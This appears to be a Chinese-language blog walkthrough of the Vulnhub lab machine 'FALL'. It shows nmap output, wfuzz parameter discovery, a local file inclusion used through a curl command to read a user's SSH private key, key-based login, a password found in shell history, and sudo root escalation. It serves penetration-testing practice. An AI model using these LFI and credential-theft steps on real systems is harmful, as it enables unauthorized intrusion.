Vulnhub靶机下载链接:
点我直接下载靶机https://download.vulnhub.com/digitalworld/FALL.7z
如果不会导入Vulnhub上的靶机,请点击我直达发车文章
在下面的操作中如果有不懂的可以直接私信博主
虚拟机的IP配置
通过arp-scanl -l来获取当前网段的存活ip。
再根据创建虚拟机的时候的MAC地址就可以拿到靶机的IP
- Kali IP:192.168.2.103
- 靶机IP:192.168.2.128
渗透目标:
- 获取靶机/root/目录下的flag文件
渗透概括:
- web目录扫描
- wfuzz GET参数爆破
- 通过文件包含获取私钥
- 私钥登录
- 历史记录审计
- sudo su提权
第一步:信息收集
我们这里用nmap -sS -sV -A -T4 -p- IP对靶机进行全端口综合扫描
扫描结果如下
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -T4 -p- 192.168.2.128
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 02:15 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.2.128
Host is up (0.00076s latency).
Not shown: 65387 filtered tcp ports (no-response), 135 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
111/tcp closed rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| tls-alpn:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
445/tcp open Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.2.128:9090/
10080/tcp closed amanda
10443/tcp closed cirrossp
MAC Address: 08:00:27:DB:E0:43 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 - 5.5 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 3.10 (91%), Linux 2.6.32 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-28T15:17:32
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2023-11-28T07:17:32-08:00
|_clock-skew: mean: 10h39m59s, deviation: 4h37m09s, median: 7h59m58s
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.2.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.51 seconds
发现开放的端口还是比较多的,80的http服务还有CMS,那么就首先从80端口下手
直接先目录扫一波,如下
发现了一个可疑的php文件,果断查看
第二步:模糊测试
这里报了一个缺少GET请求参数的问题
那么我们用WFUZZ爆破一下这个参数,如下
这里扫出来了一个file参数
给file参数传一个"/etc/passwd",发现正常回显了,是一个文件包含的洞.
并且在这个passwd文件里还发现了一个qiu用户
第三步:私钥获取
我们在这里尝试利用文件包含来把qiu的ssh私钥显示出来
使用"curl http://192.168.2.128/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa"命令来导出这个私钥文件,并且用cat查看一下这个文件,防止出现错误
第四步:提权
出于openssh的安全性,密钥文件权限需要给600才能够正常使用
chmod 600 id_rsa
我们跟着使用这个私钥登录qiu用户
我们进来之后,用查看一下.bash_history历史记录文件
发现了一个密码"remarkablyawesomE"
我们用"sudo -l"看一下权限
发现密码正确,并且拥有全部的sudo权限
那么我们就可以用"sudo su"命令提权了如下图。
我们再查看flag文件即可,该靶机就已经完成了。